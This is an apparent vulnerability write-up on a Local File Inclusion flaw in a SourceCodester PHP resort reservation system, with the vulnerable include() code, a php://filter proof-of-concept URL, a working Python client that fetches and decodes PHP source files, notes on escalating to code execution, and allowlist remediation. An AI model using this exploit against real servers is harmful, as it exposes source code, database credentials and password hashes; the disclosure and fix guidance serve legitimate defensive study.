Local File Inclusion in a PHP Reservation System — From Parameter Abuse to Source Code Disclosure
A technical analysis of a critical LFI vulnerability in a publicly available PHP application.
Cyber Tamarin
~2 min read
March 27, 2026 (Updated: March 27, 2026)
Overview
While reviewing publicly available PHP projects, I identified a critical Local File Inclusion (LFI) vulnerability in a Resort Reservation System built with PHP and SQLite3, published on SourceCodester.
The issue allows an authenticated user to read application files the web server can access, disclose PHP source code, and, under certain conditions, escalate to remote code execution.
Affected Application
Application: Resort Reservation System (PHP + SQLite3)
Vendor/Source: SourceCodester
Affected Component: index.php
Attack Surface: page parameter
Vulnerability Type
CWE-98: Improper Control of Filename for Include/Require Statement
Severity
CVSS v3.1 Base Score: 8.1 (High), as computed from the vector below (PR:L with C:H/I:H/A:N yields 8.1, not 8.8)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
Description
The Resort Reservation System application is vulnerable to Local File Inclusion (LFI) due to improper handling of user-supplied input in the page parameter.
The application passes the page parameter straight into a PHP include() call, with no validation or sanitization:

$page = $_GET['page'] ?? 'home';
include($page . ".php");

Because ".php" is appended, the attacker cannot name an arbitrary non-PHP file directly, but the value is still used as a stream path. An authenticated attacker can therefore supply a php://filter wrapper (for example php://filter/convert.base64-encode/resource=DBConnection): the appended extension completes the resource name, the filter base64-encodes the file before include() evaluates it, and the PHP source is returned as text instead of being executed. This discloses the source of any .php file readable by the web server process.
Proof of Concept (PoC)
Request
http://localhost:8000/?page=php://filter/convert.base64-encode/resource=DBConnection
Result
The server returns the base64-encoded contents of DBConnection.php
Decoding the output reveals the full source code of the file
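As an added example, not code from the original post or the project, the following Python client reproduces the PoC request above and recovers the PHP source from the response. It works for any file name, not just DBConnection. Assumed for the demo: the base URL http://localhost:8000/ from the PoC, that index.php renders the included output inside its usual HTML (so the base64 blob has to be picked out of the markup), that a logged-in session cookie may be required (the post describes an authenticated attacker), and a constructed sample DBConnection.php body. The script only contacts a host when fetch_source() is called explicitly; use it only against systems you are authorised to test.

```python
"""Added example: reproduce the php://filter PoC and decode what comes back.

Not the original post's code. Assumptions (not stated in the post): base URL
http://localhost:8000/ as in the PoC, the included output is embedded in the
page's normal HTML, and a session cookie may be needed for index.php.
"""
import base64
import re
import sys
import urllib.parse
import urllib.request
from typing import Optional

FILTER = "php://filter/convert.base64-encode/resource="


def php_filter_url(base_url: str, resource: str) -> str:
    """Build the PoC URL for a PHP file given WITHOUT its extension:
    index.php appends ".php" itself, so resource=DBConnection reaches
    DBConnection.php. The base64 filter makes include() emit the file as
    text instead of executing it. ':', '/' and '=' are left unescaped so
    the URL matches the write-up; the server accepts either form."""
    page = urllib.parse.quote(FILTER + resource, safe=":/=")
    return f"{base_url.rstrip('/')}/?page={page}"


# Base64 alphabet, at least 40 chars, optional padding. HTML tags and
# attributes break up long alphanumeric runs, so the longest match is the
# filter output (heuristic: a minified script or a JWT could compete).
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def extract_base64(body: str) -> str:
    """Pull the encoded file out of the surrounding HTML."""
    runs = _B64_RUN.findall(body)
    if not runs:
        raise ValueError("no base64 blob found: is the page value reaching include()?")
    return max(runs, key=len)


def decode_source(body: str) -> str:
    """Recover the PHP source from a full response body."""
    blob = extract_base64(body)
    blob += "=" * (-len(blob) % 4)  # tolerate stripped padding
    return base64.b64decode(blob, validate=True).decode("utf-8", errors="replace")


def fetch_source(base_url: str, resource: str, cookie: Optional[str] = None,
                 timeout: float = 10.0) -> str:
    """Issue the request against a live instance and return the decoded source.
    Pass the session cookie of a logged-in user (e.g. "PHPSESSID=...") if the
    deployment requires authentication, as the write-up states."""
    headers = {"User-Agent": "lfi-poc"}
    if cookie:
        headers["Cookie"] = cookie
    req = urllib.request.Request(php_filter_url(base_url, resource), headers=headers)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return decode_source(resp.read().decode("utf-8", errors="replace"))


# Constructed sample response (invented for this demo, not the project's real
# DBConnection.php): the encoded file sits inside the page's markup.
SAMPLE_SOURCE = "<?php\n$db = new SQLite3(__DIR__ . '/database/resort.db');\n"
SAMPLE_BODY = ('<html><body><div class="content">'
               + base64.b64encode(SAMPLE_SOURCE.encode()).decode()
               + "</div></body></html>")


if __name__ == "__main__":
    # python lfi_poc.py http://localhost:8000/ DBConnection [cookie]
    if len(sys.argv) >= 3:
        print(fetch_source(sys.argv[1], sys.argv[2],
                           sys.argv[3] if len(sys.argv) > 3 else None))
    else:
        print(php_filter_url("http://localhost:8000/", "DBConnection"))
        print(decode_source(SAMPLE_BODY))
```

Run without arguments to see the PoC URL and the decoded constructed sample; pass a base URL, a resource name and optionally a cookie to query a live instance. The longest-run heuristic in extract_base64() is what makes the decoder usable when the application wraps the filter output in its template rather than returning the bare blob.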
Impact
An authenticated attacker can exploit this vulnerability to:
Read arbitrary PHP source files on the server
Access sensitive application components such as:
DBConnection.php
auth.php
login.php
Master.php
Extract database credentials and internal application logic
Obtain password hashes (e.g., bcrypt hashes of administrative users)
Additionally, this vulnerability may be leveraged to achieve Remote Code Execution (RCE) through techniques such as log poisoning or inclusion of attacker-controlled files. Note that because index.php appends ".php" to the supplied value, such escalation requires an attacker-influenced file whose path ends in .php (for example an upload location that accepts that extension); the classic route of including a raw web-server log is not directly reachable with this suffix.
Attack Vector
Access Level: Authenticated user (low privilege)
Attack Complexity: Low
User Interaction: None required
Root Cause
The vulnerability arises from:
Direct use of user-controlled input in include()
Lack of input validation or sanitization
Absence of an allowlist mechanism for permitted files
Remediation
To mitigate this issue:
1. Implement a strict allowlist of permitted pages and fall back to a known page for anything else:

$allowed_pages = [
    'home','rooms','fees','reservations',
    'users','manage_room','manage_reservation',
    'manage_user','update_account','view_room',
    'view_reservation','view_fee','reports'
];
// Strict comparison (third argument) so only an exact string from the list passes.
$page = in_array($_GET['page'] ?? '', $allowed_pages, true)
    ? $_GET['page']
    : 'home';
include($page . '.php');
2. Avoid using user input directly in file inclusion functions
3. Use absolute paths for includes where possible
4. Disable unnecessary PHP stream wrappers where applicable (allow_url_include is off by default; php:// is built in and can only be unregistered at runtime with stream_wrapper_unregister(), so this is secondary to the allowlist)
5. Apply principle of least privilege for file access
#bug-bounty #cybersecurity